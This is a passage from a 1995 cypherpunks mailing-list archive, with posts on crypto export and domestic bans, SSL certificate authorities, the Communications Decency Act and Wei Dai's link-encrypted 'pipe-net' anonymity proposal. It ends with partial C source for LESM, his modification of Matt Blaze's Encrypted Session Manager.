separate partition.  SecureDevice uses a container file instead of a
separate partition. 

You also asked about Linux.  I think that Matt Blaze's CFS would work 
there, but I don't know.

--apb (Alan Barrett)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Sattler <msattler@jungle.com>
Date: Thu, 9 Feb 95 17:03:59 PST
To: cypherpunks@toad.com
Subject: Re: Wed 15 Feb, 730pm: BayFF's first monthly Bay Area EFF meeting
Message-ID: <v0300141dab606b6fed94@[140.174.229.220]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:56 2/9/95, gnu@toad.com wrote:

>John Gilmore and Cindy Cohn will speak on the constitutional issues
>around export controls on cryptography.

Forget export; I fear that among the next n logical steps is to ban private
strong crypto for US citizens.  Otherwise what's the point of the
legislative path we're seeing trod.

-----------------------------------------------------------------------+
Michael Sattler <msattler@jungle.com>       San Francisco, California  |
Digital Jungle Consulting Services     http://www.jungle.com/msattler/ |
                                                                       |
      You couldn't get a clue during the clue mating season in         |
 a field full of horny clues if you smeared your body with clue musk   |
           and did the clue mating dance. - Edward Flaherty            |






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jltocher@CCGATE.HAC.COM
Date: Thu, 9 Feb 95 17:25:31 PST
To: Cypherpunks@toad.com
Subject: No Subject
Message-ID: <9501097923.AA792379483@CCGATE.HAC.COM>
MIME-Version: 1.0
Content-Type: text/plain


     From Edupage:
     
     ONLINE SPYING
     While you're connected to your favorite Web page, it's also connected 
     to you, and could be copying all sorts of information off your hard 
     drive, say industry experts. In fact, it happened last year when 
     Central Point Software used registration software developed by 
     Pipeline Communications, and inadvertently also gathered descriptions 
     of the users' systems -- the type of microprocessor, the version of 
     DOS and Windows, the type of display and mouse, and the amount of free 
     space available on the hard drive. Customers squawked, and Central 
     Point had Pipeline change the software. However, Pipeline reports that 
     at least one of its clients is using the scanning feature now -- but 
     only after getting the owner's permission. The lesson? "If you can't 
     trust it, don't connect to it." (Forbes 2/13/95 p.186)
     
John L. Tocher                THE CITY-a bounded infinity.   A labyrinth where
JLTocher@ccgate.HAC.com       you are never lost. Your private map where every
PGP:  CE 72 1A 11 07 47 35    block bears exactly the same number. Even if you
35 9A C1 DE EA 64 21 BC 94    lose your way, you cannot go wrong.   --Kobo Abe


     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Thu, 9 Feb 95 17:50:02 PST
To: cypherpunks@toad.com
Subject: RE: a new way to do anonymity
Message-ID: <199502100149.AA28876@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Eric Hughes wrote:

> Now here's an important detail that needs to get done right.  Is the
> forwarding for fixed length packets, variable length packets, or
> streams?  Is this decision global or local?  What are the latency and
> aggregatation effects?  How important are these for different classes
> of data?  (telnet v. voice, e.g.)

I'm not sure I understand the first question.  My idea was originally 
based on link encrypted streams.  How can forwarding variable length 
packets help untracibility?  Wouldn't an attacker just have to match 
up the sizes of incoming and outgoing packets?  Forwarding fixed 
length packets, on the other hands, just makes the system a 
remailer-net (so you'll have to do mixing, etc.).  What am I 
misunderstanding here?

> I'd suggest just getting something running first, to get some
> prototyping experience.

I just finished hacking ESM to do link encryption.  (see my 
other post)  Now if someone is willing to run a MUD type program and 
hook LESM up with it, then we'd have the first prototype of a 
pipe-net.

Wei Dai


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzrFzzl0sXKgdnV5AQFfOAP7BpGWmo7FLK02a10NVTfgLEeheBosazzz
0TbFs2dwhtL4IRtY6To25e7MN2cz4X+qKJOleWy6uGbUowygHKbd1uiHOS9DNRmx
/fKeyIlGd/Ogv6hSpiL/JDd0vx7vVx9Ho1CIy+oAFq4v8Kwd0sqQenqqvhBdoEfA
zmVUpc+82nU=
=3mfe
-----END PGP SIGNATURE-----

E-mail: Wei Dai <weidai@eskimo.com>   URL: "http://www.eskimo.com/~weidai"
=================== Exponential Increase of Complexity ===================
--> singularity --> atoms --> macromolecules --> biological evolution
--> central nervous systems --> symbolic communication --> homo sapiens
--> digital computers --> internetworking --> close-coupled automation
--> broadband brain-to-net connections --> artificial intelligence
--> distributed consciousness --> group minds --> ? ? ?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Thu, 9 Feb 95 17:52:22 PST
To: Johnathan Corgan <jcorgan@aeinet.com>
Subject: RE: a new way to do anonymity
Message-ID: <199502100152.AA29075@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Johnathan Corgan wrote:

> Wei, your traffic analysis treatment of this sort of thing would go a long way
> toward uncovering weaknesses and determining operational requirements and 
> limitations.

It seems to me that if a user maintains a 24-hour a day pipe to an 
uncompromised server, then the method I described earlier against 
remailers should not work against that user.  Otherwise, some kind of 
in-out statistical analysis may work.

> Tim, what massive social effects would it have if this type of network service
> were to become widely deployed? :)

See Verner Vinge's _True Names_ for a fictional description of a future 
where real time anonymous interactions are possible.

> At first glance, this Pipe-Net idea doesn't seem to take a lot of rocket science; 
> it seems that most of the components or algorithms are are already in use, just 
> in a very different way.

This is certainly true.  The system Vinge describes is almost a 
pipe-net.  But he didn't say anything about link encryption, without 
which the system can be trivially broken.

> I can think of a number of problems already, however.  Spamming.  Bandwidth
> limitations.  Complexity of client and switch software.  Standards.  Flow
> control.
>
> In other works, all the stuff the ATM forum is already dealing with :)

I haven't responded to the comments you made about the similarity between 
pipe-net and ATM, mostly because I'm not very familiar with ATM.  But 
as I understand it, ATM is based on forwarding fixed length cells, 
whereas pipe-net is based on fixed-bandwidth link encrypted streams.

Spamming, and flow control shouldn't be problems, since all users 
of a server will connect to it with pipes of the same bandwidth, so it 
can just accept a certain number and then stop.

Bandwidth limitations will depend on how fast the server CPU can do 
the encryption and decryption.  With LESM at 100 cps, each connection 
took 2% of the CPU capacity of a Sun 4-CPU(90Hz) 4/670MP.  Of course, 
I made no consideration for efficiency when I hacked ESM, so this can 
probably be decreased quite a bit.

Wei Dai

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzrGOzl0sXKgdnV5AQE1TQP/UR0xfaS/Nxk7ta/AfdRhzV+v+BmpxT4O
UqiMkCpXRZbMFTuw/hnhlJ9fuOF2QS/50MUHXu+kiFSASH5wBFpLNSgWuFIHADny
76RYSjpA+A4IpWomihGT1/BPZkyIcooDXCKGUbgWjZhi50S0oCfAILjV/1ti2f02
AOyBxRYRYvM=
=IhUw
-----END PGP SIGNATURE-----

E-mail: Wei Dai <weidai@eskimo.com>   URL: "http://www.eskimo.com/~weidai"
=================== Exponential Increase of Complexity ===================
--> singularity --> atoms --> macromolecules --> biological evolution
--> central nervous systems --> symbolic communication --> homo sapiens
--> digital computers --> internetworking --> close-coupled automation
--> broadband brain-to-net connections --> artificial intelligence
--> distributed consciousness --> group minds --> ? ? ?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joshua geller <joshua@dee.retix.com>
Date: Thu, 9 Feb 95 17:52:12 PST
To: emerth@gpu.srv.ualberta.ca
Subject: Re: So, what's it all about?
In-Reply-To: <199502100127.SAA82871@gpu2.srv.ualberta.ca>
Message-ID: <199502100151.RAA25844@sleepy.retix.com>
MIME-Version: 1.0
Content-Type: text/plain



>   I went to a UNIX trade show yesterday, and the main speaker was a 
>   security type. He talked about "the cypherpunks" among other things.
>   He said you are really scary and dangerous and ...
>   But of course he had to also project this adress (cypherpunks@toad.com)
>   on the screen.

can't imagine he is much of a security stud if he is that deluded.

what was his name?

josh




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Thu, 9 Feb 95 14:58:47 PST
To: slowdog@wookie.net (slowdog)
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <Pine.LNX.3.91.950209105014.8284B-100000@chewy.wookie.net>
Message-ID: <199502092258.RAA02881@libws2.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



> On Thu, 9 Feb 1995, Robert Rothenburg Walking-Owl wrote:
> 
> > The line between indecency and obscenity is vague. Legal defense fees are
> > not... not are opportunistic prosecutors-- which is a real problem. Look at
> > what happened to Jello Biafra and the Dead Kennedys if you'd like an

[ .. ]

> This is part of the danger. It to omse degree doesn't matter how 
> restictive or "enforceable" the law might be, or even whether or not 
> prosecutins will stick. Arrests and prosecutions will take a financial 
> toll on those targetted, and will create a chillinf effect in the online 
> community, meaning sysops and BBS operators will start policing 
> themselves too severely in an effort to avoid politcial or legal scrutiny.

Exactly. It's already happening. I've noticed on local BBS's they are afraid
of conversation about controversial subjects or files having to do with
things like do-it-yourself-birth control methods, drug legalization, or
crypto... some of the networks like RIME are also jittery about certain
topics like crypto or how telephones work.

> > The "safe harbor" is 10pm, but many radio stations (like WUSB here in Stony

[ message accidentally zapped ]

> broadcast paradigm, while the online world operates within the network 
> paradigm. There are no hours in which it is safe to broadcast because 
> there is no "broadcast" in the tradition sense.

Yes, I was discussing broadcasting. Scary thought is that because networks
are different they will try to outright ban everything.

What boggles my mind is how that hypothetical ratings system(s) the WSJ
article mentioned would operate... let alone who would rate content (very
controversial in movie ratings here in the US).

> > Problems with these vague and-or unenforcable "decency" laws is that they
> > allow for selective enforcement which is often motivated more by politics
> > and personal greed than by their alleged concerns for decency.

> And is also, as stated above, often motivated out of a desire to force 
> the public to overly-police themselves to avoid prosecution.

And "voluntarily" comply with their sense of values.

> - dog

Rob.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kipp@warp.mcom.com (Kipp E.B. Hickman)
Date: Thu, 9 Feb 95 10:04:03 PST
To: cypherpunks@toad.com
Subject: Re: skronk
In-Reply-To: <199502081852.KAA01719@gwarn.versant.com>
Message-ID: <3hdl7u$35a@flop.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain



In article <199502082025.MAA00565@jobe.shell.portal.com>, hfinney@shell.portal.com writes:
> >THUS SPAKE "Kipp E.B. Hickman" <kipp@warp.mcom.com>:
> ># It does what you are trying to accomplish (I think), and it is already deployed
> ># in production code (the Netscape client and server products). In addition, we
> ># announced this week a free (for non-commerical use) reference implementation.
> ># The code will be out on the net as soon as the lawyers are happy :-)
> 
> When we last left this story, only certificates from a few (one?)
> signatory authorities were going to be accepted by Netscape clients.
> Would this mean that competitors offering Netscape servers would have to
> go to Netscape to get their keys signed in order to interoperate with
> existing Netscape clients?  I think this is too limiting.

The SSL protocol doesn't define how certificates are truly validated:
It does indicate what operations should be performed, but it doesn't
say how you go about getting the data to perform the operations.

Because there isn't a solid public-key infrastructure in place today,
the Netscape Navigator product (1.0 and the up and coming 1.1) only
support a few well known CA's that are built into the client
(ick). The CA's that are supported today are:

    C=US, OU=Test CA, O=Netscape Communications Corp.
    C=US, O=RSA Data Security, Inc., OU=Commercial Certification Authority
    C=US, O=RSA Data Security, Inc., OU=Secure Server Certification Authority
    C=US, O=MCI, OU=internetMCI, OU=MALL

So you see, you don't have to come to Netscape Communications Corp. to
get a certificate. Of course, this list is kinda short, etc. etc. etc.
We have IPRA's certificate too, but because IPRA has no financial
backbone, we have not included it in the Navigator product.

> People should be able to choose their own key signers.  This should be a
> configuration option.  It should not be compiled into the client!  That
> hurts your own flexibility as well as interfering with interoperatbiliy.

Of course this sucks. We plan on fixing this in a future release of
the navigator (after the 1.1 release).

> Can I use this reference implementation and set up a SSL-compatible
> service today, or do I have to go to you and/or everyone's friends at RSA
> and get a signature first?  As long as it is the latter I think that SSL
> is not going to be able to be a well-established standard.  People are
> going to resent having to register with the authorities in order to set
> up a secure web page.

SSL requires server operators to be certified so that the end users
(e.g. consumers) can have some faith in the data they are receiving,
and believe in the privacy of the communications. IMHO, before you can
get the consumers to truly believe, you must have a technically sound
solution.

It would be possible to modify the protocol to allow a non-certified
server to operate. However, this sort of thing is subject to the
man-in-the-middle attack. If we allow this sort of attack, and it
turns out to be the only easy way for an attack to occur, guess what
will happen?

---------------------------------------------------------------------
Kipp E.B. Hickman          Netscape Communications Corp.
kipp@netscape.com          http://home.mcom.com/people/kipp/index.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Thu, 9 Feb 95 15:03:44 PST
To: joshua@dee.retix.com (joshua geller)
Subject: Re: Not necessarily crypto but scary anyway...
In-Reply-To: <199502091612.IAA25397@sleepy.retix.com>
Message-ID: <199502092303.SAA03244@libws2.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> >   Yes indeed, in response to the H666 bill. The Dems placed up for vote the 
> >   text of the 4th Amendment without attributing it to be such. It was 
> >   defeated. Dems then immediately took to the floor of the House accusing 
> >   the Repubs of tryingto dismantle the Constitution.
> 
> so is there a list of names of the people who voted against it? I use
> the term "people" very loosely.

A list of what congresspersons voted for/against various bills (even previous
ones like Cantwell and DT) would be useful. A lot of groups do that.


> 
> josh
> 

Rob





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in (Rishab Aiyer Ghosh)
Date: Thu, 9 Feb 95 23:09:20 PST
To: cypherpunks@toad.com
Subject: Re:  Selection key crypto protocol trial balloon
In-Reply-To: <9502082007.AA09524@anchor.ho.att.com>
Message-ID: <awLe2c4w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


wcs@anchor.ho.att.com writes:

> > Um no. The main thing is that what is extracted with the selection key is
> > _different_ from what was put in...
> 
> But the only things the selectioon key can extract are what the senders
> put in plus what the system did to it once it was there, which is not
> informationally different than what the senders put there.

True, just as ciphertext is not different, informationally, from plaintext.
It's just a pair of transformations, both by the system, one in response to
the sender and the other in response to the receiver. A bit like an airlock -
if the two transformations are the right ones, extraneous information such as
the identity should not pass through.

> I suppose you could play some games by sending the message in 
> multiple parts, with parts sent by 1-way anonymous remailer,
> but there's still a certain amount of traffic analysis you can do.
> 
> 	Bill


-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Thu, 9 Feb 95 23:09:19 PST
To: cypherpunks@toad.com
Subject: Labour and capital in a post-industrial economy
Message-ID: <gate.T140Zc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


Earlier I'd written on the fall of corporations due to cryptoanarchy. This one
is on the decline of (knowledge) capital and property rights, and the rise of
labour.

------cut here-------
Electric Dreams
Weekly column for The Asian Age by Rishab Aiyer Ghosh
#47, 6/February/1995: Labour and capital in a post-industrial economy

The information economy will require not only knowledge
capital, but also knowledge labour. Labour has
historically been subservient to capital (or land, in
agricultural societies) as a source of power and wealth,
leading to various forms of political upheaval contrary to
the naturally unequal relationship between these two
essentials of an economy. But the knowledge revolution
will change the nature of labour even more than it will
that of capital, while also decreasing the distinction
between them.

One of the major differences between capital and labour in
the past is that capital, owned and protected by property
rights, can earn for its owners without their making any
significant effort. Labour, though, is inherent in its
'owners' - you really don't need laws to protect your
ownership of your capacity to work - and earns only with
considerable effort from them. It follows that owners of
capital are wealthier than providers of labour, at least
until a digital deluge changes the rules altogether.

A strict (but not universally accepted) definition of
knowledge capital would consist primarily of those
relatively static forms of intellectual output - specific
ideas, software, works of art - that can be treated as
property, thereby inviting legal protection in the form of
patent and copyright. Like traditional capital, these
don't necessarily require the intervention of their owner
(after the work of painting or inventing is over) to
generate cash. Intellectual property rights will do the
earning.

Unfortunately for fans of intellectual property rights,
they are unworkable. As the sprawling information economy
grows volatile and fast-changing, copyrights and patents
are simply not going to be enforced. The ease of
undetectable duplication, together with the suffocating
effects of strong protection on growing markets, have been
acknowledged by everyone familiar with both the
technological as well as economic aspects. Expertise,
then, not information, is the key.

Expertise, which is dynamic and constantly adapting, is
not 'intellectual property'. It hardly requires legal
protection, and cannot be separated from its owners, the
experts, in whom it inheres. Nor do experts earn without
themselves making active use of their skills. Experts are,
in fact, knowledge labourers.

Not, of course, that these labourers own no capital. Quite
the contrary -experts almost always rely on more static
works, ideas, resources, that are their own. However, this
'property' being less important than their expertise,
knowledge labourers (or knowledge workers, to use a more
familiar but not always equivalent term) often don't
bother about patents or copyrights. Knowledge capital is
not, after all, as valuable as expertise and is also more
inconvenient to rely on - so it will act as the auxiliary
resource, rather as labour has done in industry.

Once we realize this reversal of roles between labour and
capital in a post-industrial economy, we face the prospect
of a vast labour force of experts of all sorts. Knowledge
labour will not always be high-end, though - for every
millionaire quant plotting coffee futures against money-
market derivatives, there will be the human agent,
cybrarian in the jargon, hunting for curious clients rare
species of data amid the information jungle. And there
will always be some who cling on to their intellectual
property rights and attempt to extract license fees from
the on-line universe. But their share of the economy will
shrink, and finally, in the era of expertise, what you
have will matter less, than what you do.



Rishab Aiyer Ghosh is a freelance technology consultant
and writer. You can reach him through voice mail (+91 11
3760335) or e-mail (rishab@dxm.ernet.in).

--====(C) Copyright 1994 Rishab Aiyer Ghosh. ALL RIGHTS RESERVED====--
 This article may be redistributed in electronic form only, PROVIDED 
 THAT THE ARTICLE AND THIS NOTICE REMAIN INTACT. This article MAY NOT 
 UNDER ANY CIRCUMSTANCES be redistributed in any non-electronic form,
 or redistributed in any form for compensation of any kind, WITHOUT 
PRIOR WRITTEN PERMISSION from Rishab Aiyer Ghosh (rishab@dxm.ernet.in)
--==================================================================--

------cut here-------


-----------------------------------------------------------------------------
For Electric Dreams subscriptions and back issues, send a mail to
rishab@arbornet.org with 'get help' as the message Subject.

Rishab Aiyer Ghosh          rishab@dxm.ernet.in           rishab@arbornet.org
Vox +91 11 6853410 Voxmail 3760335       H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Eric Merth" <emerth@gpu.srv.ualberta.ca>
Date: Thu, 9 Feb 95 17:27:21 PST
To: cypherpunks@toad.com
Subject: So, what's it all about?
Message-ID: <199502100127.SAA82871@gpu2.srv.ualberta.ca>
MIME-Version: 1.0
Content-Type: text


I went to a UNIX trade show yesterday, and the main speaker was a 
security type. He talked about "the cypherpunks" among other things.
He said you are really scary and dangerous and ...
But of course he had to also project this adress (cypherpunks@toad.com)
on the screen.

So are you really scary and dangerous? What are the cypherpunks?

Just curious,

-EWM



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Thu, 9 Feb 95 18:43:52 PST
To: cypherpunks@toad.com
Subject: LESM - Link Encrypted Session Manager (3rd try)
Message-ID: <199502100243.AA03571@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


I tried to distribute LESM to the cypherpunks mailing list twice, and 
neither of them made it to the nntp.hks.com list archive (my 
laster posts HAVE).  What is going on here?  This is a second repost.

-----BEGIN PGP SIGNED MESSAGE-----

I finished hacking Matt's ESM to do link encryption yesterday, but 
for some reason the mail I sent to cypherpunks didn't get echoed back 
to me, so I'm sending this again.

To install: get ESM and RSAREF, make sure you can compile ESM, 
then replace the esm.c with my hacked version and recompile.

To use: same as ESM, but there's an extra option "-b bandwidth", the 
default is 100 cps.

I've attached the modified esm.c here since it doesn't include any 
crypto code.  To get ESM, write to cfs@research.att.com and state the 
following:

	- you are in the US or Canada, and
	- you are a US or Canadian citizen or legal permanent
	  resident, and
	- You've read and understand the license and export
	  conditions.

RSAREF is in ftp://rsa.com/rsaref/

Wei Dai


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzqTtTl0sXKgdnV5AQEmbgP8CRxE+RCGsDXwwShWhZKGytSywyWZ8RXB
RPBHZmk6UgdpCR2VVo8wXjcPuEv4SHp9ZjhFTq53JZ/s3YcV5FxF33/ivSlh1Ra4
P8GSYnoEaIJoFrJyagukbBUaY6zWCx0PcnsLoVArCxujwRYwfrQvHdiNx13z7bJh
OSEhhoE9djg=
=PY8P
-----END PGP SIGNATURE-----


-------------- Enclosure number 1 ----------------
/*
 * LESM - Link Encrypted Session Manager
 * v0.6a.01
 * Wei Dai
 * 2/8/1995
 *
 * This program is a quick and dirty hack of:
 */

/*
 * ESM - Encrypted Session Manager
 * v0.6a
 * matt blaze
 * January 1995
 */

/*
 * The author of this software is Matt Blaze.
 *              Copyright (c) 1995 by AT&T.
 * Permission to use, copy, and modify this software without fee
 * is hereby granted, provided that this entire notice is included in
 * all copies of any software which is or includes a copy or
 * modification of this software and in all copies of the supporting
 * documentation for such software.
 *
 * This software is subject to United States export controls.
 *
 * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
 * WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
 * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
 * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE.
 */
/*
 * Some of this file was stolen from the BSD "script" program, which
 * is covered under the following notice:
 *
 * Copyright (c) 1980 Regents of the University of California.
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 *    must display the following acknowledgement:
 *	This product includes software developed by the University of
 *	California, Berkeley and its contributors.
 * 4. Neither the name of the University nor the names of its contributors
 *    may be used to endorse or promote products derived from this software
 *    without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 */

#ifndef lint
char copyright1[] =
"@(#) Copyright (c) 1980 Regents of the University of California.\n\
 All rights reserved.\n";
char copyright2[] =
"@(#) Copyright (c) 1995 AT&T\nAll rights reserved.\n";
#endif /* not lint */

#include <sys/types.h>
#include <sys/stat.h>
#include <termios.h>
#ifndef SUN
#include <sys/ioctl.h>
#endif
#include <sys/time.h>
#include <sys/file.h>
#include <sys/signal.h>
#include <unistd.h>
#include <stdio.h>
#include "global.h"
#include "rsaref.h"
#include "esm.h"


char	*shell;
int	master;
int	slave;
int	subchild;

int escape=036; /* ^^ */
int ciphstate=0;
int ciphbyte=0;

int keyed=0;

struct	termios tt;
struct	winsize win;
int	lb;
int	l;
char	line[] = "/dev/ptyXX";
int	aflg;

#define REMOTE 0
#define LOCAL 1
#define CALC 2

int mode=LOCAL;
int paranoid=0;

#define SL_START 0
#define SL_GOT1 1
#define SL_GOT2 2
#define SL_GOT3 3
#define SL_GOT4 4
#define SL_KEYING 5
#define SL_CRYPT 6
int sloutstate=SL_START;
char *cmd=NULL;

#define TRANS 0
#define CMDWAIT 1
#define CIPHER 2
#define KEYWAIT 3

#define IV0 0
#define IV1 1
#define IV2 2
#define IV3 3
#define C0  4
#define C1  5

int state=TRANS;
int cstate=IV0;

FILE *fpmaster;

struct timeval tvPause={0,10000};
struct timeval tvNoPause={0,0};

unsigned char filler = (unsigned char) 31;

#define bwrite(fp,buf,len) (fwrite(buf,len,1,fp))

main(argc, argv)
	int argc;
	char *argv[];
{
	extern char *optarg;
	extern int optind;
	int ch, result;
	void finish();
	char *getenv();
	fd_set fds;
        struct timeval tv;

	while ((ch = getopt(argc, argv, "e:b:splrci")) != EOF)
	  	switch((char)ch) {
	  	    case 'e':
	  		cmd=optarg;
	  		break;
                    case 'b':
                    	tvPause.tv_usec=(long)1000000/atol(optarg);
                        break;
	  	    case 'i':
	  	    case 's':
	  	    case 'p':
	  		paranoid=1;
	  	    case 'r':
	  		mode=REMOTE;
	  		break;
	  	    case 'l':
	  		mode=LOCAL;
	  		break;
	  	    case 'c':
	  		mode=CALC;
	  		break;
	  	    case '?':
	  	    default:
	  		fprintf(stderr,
	  		   "usage: lesm [-rlc] [-b bandwidth] [-e program\n");
	  		exit(1);
	  	}
	argc -= optind;
	argv += optind;

	if ((shell=getenv("SHELL")) == NULL)
		shell = "/bin/sh";
	
      	getmaster();

	(void) signal(SIGCHLD, finish);
	subchild = fork();
	if (subchild < 0) {
		perror("fork");
		fail();
	}
	if (subchild==0)
		doshell();
	else {
		/* main loop */
		printf("LESM v0.6a.01, hacked by Wei Dai from ESM v0.6a - encrypted session manager\n");
		printf("    by Matt Blaze, AT&T Bell Labs, January 1995\n");
	       	randinit();
		cipherinit();
		switch (mode) {
		    case REMOTE:
			if (paranoid)
			     printf("remote server ready\n");
			else
			     printf("remote server ready; ctl-^ to escape\n");
			break;
		    case LOCAL:
			printf("local layer ready (run 'lesm -s' on remote)\n");
			break;  
		    default:  /* not yet */
			printf("lesm ready\n");
		}
		rawtty();
		fpmaster=fdopen(master,"w");
		if (fpmaster == NULL)
			done();
		if (paranoid)
			startsession();
            
                while(1)
                {
			FD_ZERO(&fds);
			FD_SET(0,&fds);
                        
                        tv=tvNoPause;
                        result=select (FD_SETSIZE,&fds,NULL,NULL,&tv);

                        if (result==1)
                        	doinput();

      	                if (mode==LOCAL && sloutstate==SL_CRYPT && result==0)
                        	doslavein(filler);
                                
                        if (result<0)
                        	break;

	       		FD_ZERO(&fds);
	       		FD_SET(master,&fds);
                        
                        tv=tvNoPause;
                        result=select (FD_SETSIZE,&fds,NULL,NULL,&tv);
	       		                    	
                        if (result==1)
                                dooutput();

                        if (mode==REMOTE && state==CIPHER && result==0)
                        	domasterout(filler);

                        if (result<0)
                        	break;
		}
		done();
	}                                          
}

doinput()
{
	int cc;
	int i;
	static unsigned char ibuf[512];
	
	if ((cc = read(0, ibuf, 512)) > 0) {
		switch (mode) {
		    case REMOTE:
			for (i=0; i<cc; i++)
				domasterin(ibuf[i]);
			break;
		    case LOCAL:
			for (i=0; i<cc; i++)
				doslavein(ibuf[i]);
			break;
		    default:
			for (i=0; i<cc; i++)
				bwrite(fpmaster,&ibuf[i],1);
			break;
		}
		fflush(fpmaster);
		fflush(stdout);
	} else
		done();
}

doslavein(ibuf)
     unsigned char ibuf;
{
	int c;
	static int count=0;
        struct timeval tv;
	
	switch (sloutstate) {
	    case SL_CRYPT:
		if (ibuf==escape) {
			bwrite(stdout,">>",2);
			fflush(stdout);
			if (slescape()) {
				printf("q\r\nEntering CLEARTEXT mode\r\n");
				bwrite(fpmaster,"PPPPPPPPPPPPPPPP",16);
				sloutstate=SL_START;
			}
			break;
		}			
		c=cfb8_encrypt(ibuf);
		if (!(++count % 8))
			bwrite(fpmaster,"!",1);
		sendhex(fpmaster,c);
        	tv=tvPause;
                select (FD_SETSIZE,NULL,NULL,NULL,&tv);
		break;
	    default:
		bwrite(fpmaster,&ibuf,1);
		break;
	}
}

slescape()
{
	char buf;
	int c;
	int escaped=0;
	
	while (read(0,&buf,1)>0) {
		if (escaped) {
			escaped=0;
			bwrite(fpmaster,&buf,1);
			continue;
		}
		if (buf==escape) {
			c=cfb8_encrypt(buf);
			sendhex(fpmaster,c);
			return 0;
		}
		bwrite(stdout,&buf,1);
		fflush(stdout);
		if (buf=='\\') {
			mode=escaped;
			continue;
		}
		if (buf=='\r')
			return 0;
		if (buf=='C') {
			return 1;
		}
		printf("\r\nType one of the following:\r\n");
		printf("  \\[char] to send char as cleartext\r\n");
		printf("  ctrl-^ to send escape character\r\n");
		printf("  'C' to return to CLEARTEXT session\r\n");
		printf("  <enter> to return to encrypted session\r\n");
	}
	return 1; /* should never happen */
}

			       

domasterin(ibuf)
     unsigned char ibuf;
{
	int c;
	char ch;
	static int bad=0;
	
	switch (state) {
	    case TRANS:
	  	if (ibuf != escape)
	  		bwrite(fpmaster, &ibuf, 1);
	  	else {
	  		state=CMDWAIT;
	  		bwrite(stdout,">>",2);
	  		cstate=IV0;
	  	}
	  	break;
	    case CMDWAIT:
	  	if (ibuf == escape) {
	  		bwrite(fpmaster, &ibuf, 1);
	  		state=TRANS;
	  	} else switch (ibuf) {
	  	    case '\r':
	  	    case '\n':
	  		bwrite(stdout,"\r\n",2);
	  		state=TRANS;
	  		break;
	  	    case 's':
	  	    case 'S':
	  		startsession(LONG);
	  		break;
	  	    case 'Q':
	  		done();
	  		break;
	  	    default:
	  		printf("Type 's' to start encrypted session\r\n");
	  		printf("     'Q' to terminate remote session\r\n");
	  		printf("     ctrl-^ to send escape character\r\n");
	  		printf("     <enter> to return to session\r\n");
	  		break;
	  	}
	  	break;
	    case CIPHER:
